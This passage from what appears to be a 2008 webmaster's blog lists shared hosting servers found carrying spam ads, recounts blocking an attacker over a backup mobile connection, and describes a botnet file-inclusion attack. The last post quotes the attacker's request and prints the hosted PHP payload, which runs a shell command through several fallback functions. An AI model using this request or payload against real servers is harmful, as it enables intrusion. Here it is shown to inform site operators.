Domains: http://whois.webhosting.info/206.125.215.251?pi=4&ob=SLD&oo=ASC
Sample 1: view-source:http://oceancyclery.com/
Sample 2: view-source:http://oldpeking.com/

Server: secure2.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.252
Sample 1: view-source:http://armandmercury.com/
Sample 2: view-source:http://altonaequipment.com/

Server: secure4.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.254
View the source on any domain in the list, not all are infected but it's a more
heavily server wide infestation...

So on and so forth, you get the idea.

I spot checked a handful of servers, but based on what I've run across in the past with other similar shared server infestations it's probably on all shared servers.

DISCLAIMER: The sites and servers referenced still contained the pharma ads at the time of this writing and may be cleaned up in the future. Follow the links to check the domains hosted to see if the problem still exists in the future.

Sunday, January 20, 2008

Sprint Broadband Saves Bacon Again

Last night I was working quickly trying to stop some asshole that I found attacking my site and was just about finished with the task when suddenly BLAMMO! my SSH session terminated.

My first thought was I had just done something bad and whacked the server.

In a bit of a panic I try to pull up the site in the Firefox, nothing, dead.

Is my internet connection down?

Nope, I can get to other web sites and my other servers in different data centers just fine.

Must be Comcast having a routing problem so I quickly confirm that there's a routing issue with a traceroute and breath a sigh of relief when I can access that server via my other server.

However, this doesn't solve the problem of the asshole that was waging war on my server still abusing the damn thing. The attacker was using a huge proxy list that was more current than mine plus some other things so it wasn't as simple as just blocking a single IP address or anything like that.

So I grabbed the Sprint Broadband USB stick, plugged it in, and a minute later was back on the server via a different network connection and finished blocking the attacker.

A few hours later Comcast was functioning properly again, but thanks to Sprint Broadband I no longer feel like I'm being held hostage when Comcast's service has problems.

Having the Sprint Broadband backup is definitely not a cheap solution but it's saved my ass a few times and now I no longer need to chase Wifi hotspots when I'm on the road. If you can afford the extra $60/month for internet connection redundancy I highly recommend getting a Sprint Broadband card or an equivalent from other providers. I'll think I'll stick with Sprint until something better and faster comes along in my area!

Friday, January 18, 2008

Botnet Whacks ROBOTS.TXT File

Just when you think having your server hacked is bad enough, these idiots start messing with your robots.txt file.

Here's an example:

83.133.96.246 "GET //errors.php?error=http://www.thefalife.com/robots.txt??? HTTP/1.0" "libwww-perl/5.48"
What did that robots.txt contain?
<?php
echo "549821347819481
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."
";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Looks like botnets are now OK with messing up your search engine positions as well as messing up your server.

Just imagine that all the pages or images you have blocked are suddenly crawled.

Then imagine that every junk crawler you've denied is suddenly crawling all over your site.

It could take months or years to clean up the damage, if ever.

Fun, huh?